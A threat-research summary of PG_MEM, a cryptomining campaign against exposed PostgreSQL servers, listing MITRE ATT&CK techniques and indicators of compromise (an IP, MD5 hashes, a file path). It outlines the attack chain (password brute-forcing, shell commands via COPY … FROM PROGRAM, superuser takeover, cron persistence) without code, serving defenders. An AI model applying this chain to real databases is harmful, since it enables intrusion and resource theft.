Threat Research

PG_MEM: A Malware Concealed within Postgres Processes

Securonix

Aqua Nautilus researchers uncovered PG_MEM, a PostgreSQL malware that brute-forces database credentials, uses the COPY … FROM PROGRAM feature to run shell commands, and deploys cryptominer payloads after gaining access. The campaign targets exposed PostgreSQL servers, dropping multiple binaries (PG_Core, pg_mem, memory) and using persistence and defense-evasion techniques to maintain operation. #PG_MEM #PostgreSQL #PG_Core #PG_mem #AquaNautilus #XMRIG #Shodan

Keypoints

  • PG_MEM targets PostgreSQL databases via brute-force credential attacks.
  • Successful access enables execution of arbitrary shell commands through PostgreSQL’s PROGRAM feature (COPY … FROM PROGRAM).
  • The actor creates a superuser/local account and then strips existing superuser privileges to maintain control.
  • Persistence is achieved by removing cron jobs and adding new ones to run the pg_mem payload.
  • Two main payloads, PG_Core and pg_mem, are dropped for cryptomining operations, stored under /var/lib/postgresql/data/.
  • Over 800,000 exposed PostgreSQL databases were identified, highlighting widespread misconfigurations and risk.
  • Attack techniques are mapped to MITRE ATT&CK tactics, illustrating a multi-stage campaign spanning access, execution, persistence, and impact.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exloits a vulnerability in the Postgres database to gain initial access. ‘Exploits a vulnerability in the Postgres database to gain initial access.’
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – The attacker executes SQL commands that leverage the PROGRAM feature to run shell commands on the host system. ‘The attacker executes SQL commands that leverage the PROGRAM feature to run shell commands on the host system.’
  • [T1136.001] Create Account: Local Account – Creates a new user role with login capabilities and high privileges. ‘Creates a new user role with login capability and high privileges.’
  • [T1098] Account Manipulation – Strips superuser privileges from the existing postgres user to maintain access. ‘Strips superuser privileges from the existing postgres user to maintain access.’
  • [T1053.003] Scheduled Task/Job: Cron – Removes all cron jobs to prevent interference and adds a cron job to run pg_mem. ‘Removes all cron jobs to prevent interference and adds a cron job to run pg_mem.’
  • [T1068] Exploitation for Privilege Escalation – Escalates privileges by executing commands as a superuser. ‘Escalates privileges by executing commands as a superuser.’
  • [T1070.004] Indicator Removal on Host: File Deletion – Deletes files and logs related to malware to evade detection. ‘Deletes files and logs related to malware to evade detection.’
  • [T1036.004] Masquerading: Masquerade Task or Service – Modifies the pg_core file to be executable and disguises it as a legitimate file. ‘Modifies the pg_core file to be executable and disguises it as a legitimate file.’
  • [T1110.002] Brute Force: Password Guessing – Uses brute force to guess the user and password of the Postgres database. ‘Uses brute force to guess the user and password of the Postgres database.’
  • [T1082] System Information Discovery – Gathers system information using commands like uname and whoami. ‘Gathers system information using commands like uname and whoami.’
  • [T1057] Process Discovery – Retrieves the process ID of the PostgreSQL backend process. ‘Retrieves the process ID of the PostgreSQL backend process.’
  • [T1005] Data from Local System – Collects data by viewing and extracting information from the database. ‘Collects data by viewing and extracting information from the database.’
  • [T1105] Ingress Tool Transfer – Downloads files from a remote server to the compromised system. ‘Downloads files from a remote server to the compromised system.’
  • [T1071.001] Application Layer Protocol: Web Protocols – Uses web protocols to communicate with the remote server for command and control. ‘Uses web protocols to communicate with the remote server for command and control.’
  • [T1496] Resource Hijacking – Deploys cryptominers, leveraging the system’s resources to mine cryptocurrency. ‘Deploys cryptominers, leveraging the system’s resources to mine cryptocurrency.’

Indicators of Compromise

  • [IP] 128.199.77.96 – Used to download PG_Core and PG_mem, and to fetch payloads during delivery.
  • [MD5] 3f3eae22dd67e741e87a18a2383900a5 – Memory binary detected as cryptominer; dropped to disk.
  • [MD5] aacf2146cac9946592f069ef6d94635b – pg_core binary; dropped to disk with multiple detections.
  • [MD5] f705c3bc4e98585357c03feac623356c – pg_mem binary; dropped to disk with multiple detections.
  • [File Path] /var/lib/postgresql/data/log-tmp – temporary storage used during command execution and data staging.

Read more: https://aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint